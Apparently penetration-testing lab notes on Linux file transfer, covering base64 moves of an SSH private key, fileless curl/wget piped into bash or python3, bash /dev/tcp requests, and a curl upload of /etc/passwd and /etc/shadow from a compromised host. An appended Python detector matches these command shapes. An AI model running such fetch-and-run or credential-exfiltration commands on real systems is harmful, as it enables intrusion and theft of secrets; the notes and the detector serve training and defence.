Download to Linux
Base64
First use md5sum to check the file we want to transfer:
[!bash!]$ md5sum id_rsa
4e301756a07ded0a2dd6953abf015278 id_rsa
Now base64 encode the target:
[!bash!]$ cat id_rsa |base64 -w 0;echo
LS0tLS1CRU<snip>
On the target system, decode the base64 string:
[!bash!]$ echo -n 'LS0tLS1<snip>' | base64 -d > id_rsa
After transferring, confirm the content with md5sum:
[!bash!]$ md5sum id_rsa
4e301756a07ded0a2dd6953abf015278 id_rsa
wget
[!bash!]$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh
cURL
[!bash!]$ curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Fileless
We don't have to write the file to disk. We can pipe the download straight into an interpreter and run it from memory.
Fileless cURL
[!bash!]$ curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
Fileless wget
[!bash!]$ wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3
Hello World!
Bash
First connect to the target webserver:
[!bash!]$ exec 3<>/dev/tcp/10.10.10.32/80
Send an HTTP GET request:
[!bash!]$ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
Print the response:
[!bash!]$ cat <&3
SSH
[!bash!]$ scp plaintext@192.168.49.128:/root/myroot.txt .
Upload to Linux
Sometimes we need to upload files from the target machine to our attack host.
Upload Server
Let's see how we can configure the uploadserver module to use HTTPS.
Spin up Web server:
[!bash!]$ sudo python3 -m pip install --user uploadserver
Collecting uploadserver
Using cached uploadserver-2.0.1-py3-none-any.whl (6.9 kB)
Installing collected packages: uploadserver
Successfully installed uploadserver-2.0.1
Now we will create a certificate:
[!bash!]$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
Generating a RSA private key
................................................................................+++++
.......+++++
writing new private key to 'server.pem'
-----
Let's start a web server:
[!bash!]$ mkdir https && cd https
[!bash!]$ sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
File upload available at /upload
Serving HTTPS on 0.0.0.0 port 443 (https://0.0.0.0:443/) ...
From our compromised machine, let's upload the /etc/passwd and /etc/shadow files:
[!bash!]$ curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
Python
For Python3:
[!bash!]$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
For Python2:
[!bash!]$ python2.7 -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
PHP
[!bash!]$ php -S 0.0.0.0:8000
[Fri May 20 08:16:47 2022] PHP 7.4.28 Development Server (http://0.0.0.0:8000) started
Ruby
[!bash!]$ ruby -run -ehttpd . -p8000
[2022-05-23 09:35:46] INFO WEBrick 1.6.1
[2022-05-23 09:35:46] INFO ruby 2.7.4 (2021-07-07) [x86_64-linux-gnu]
[2022-05-23 09:35:46] INFO WEBrick::HTTPServer#start: pid=1705 port=8000
SCP
[!bash!]$ scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/
htb-student@10.129.86.90's password:
passwd
For copying an entire directory:
jadu101@htb[/htb]$ scp -r ptunnel-ng ubuntu@10.129.202.64:~/
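Detection
The transfer commands in these notes leave recognisable command lines in process telemetry. The following is an added example, not part of the original notes: it classifies command lines (assumed to come from a source such as auditd execve records or EDR process events) against the shapes shown above. The rule names and the sample lines are constructed for illustration.

```python
import re

# Hypothetical rule names; each pattern matches a command shape shown in these notes.
RULES = [
    ("pipe_to_interpreter",    # curl/wget output piped straight into a shell or Python
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(bash|sh|python[0-9.]*)\b")),
    ("bash_dev_tcp",           # bash network redirection: exec 3<>/dev/tcp/host/port
     re.compile(r"/dev/(tcp|udp)/[\w.\-]+/\d+")),
    ("base64_decode_to_file",  # pasted blob decoded and written to disk
     re.compile(r"\bbase64\s+(-d|--decode)\b[^|;]*>\s*\S+")),
    ("curl_upload_sensitive",  # multipart upload of the account databases
     re.compile(r"\bcurl\b.*(-F|--form)\s+\S*@/etc/(passwd|shadow)")),
    ("adhoc_file_server",      # one-line web servers used as transfer endpoints
     re.compile(r"\bpython[0-9.]*\s+-m\s+(http\.server|SimpleHTTPServer|uploadserver)\b"
                r"|\bphp\s+-S\s+\S+|\bruby\s+-run\s+-e\s*httpd\b")),
]

def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(lines):
    """Yield (line_number, command, matched_rules) for each line with a hit."""
    for n, line in enumerate(lines, 1):
        hits = classify(line.strip())
        if hits:
            yield n, line.strip(), hits

# Constructed sample: commands from this page mixed with ordinary ones.
SAMPLE = [
    "md5sum id_rsa",
    "cat id_rsa | base64 -w 0",
    'echo -n "$B64" | base64 -d > id_rsa',
    "curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh",
    "curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash",
    "wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3",
    "exec 3<>/dev/tcp/10.10.10.32/80",
    "curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' --insecure",
    "sudo python3 -m uploadserver 443 --server-certificate ~/server.pem",
    "ruby -run -ehttpd . -p8000",
]

if __name__ == "__main__":
    for n, cmd, hits in scan(SAMPLE):
        print(f"line {n}: {','.join(hits)}: {cmd}")
```

A plain download to disk (curl -o, wget -O) is deliberately left unflagged; the rules are heuristics that key on the download-and-execute, raw-socket, decode-to-file and upload shapes.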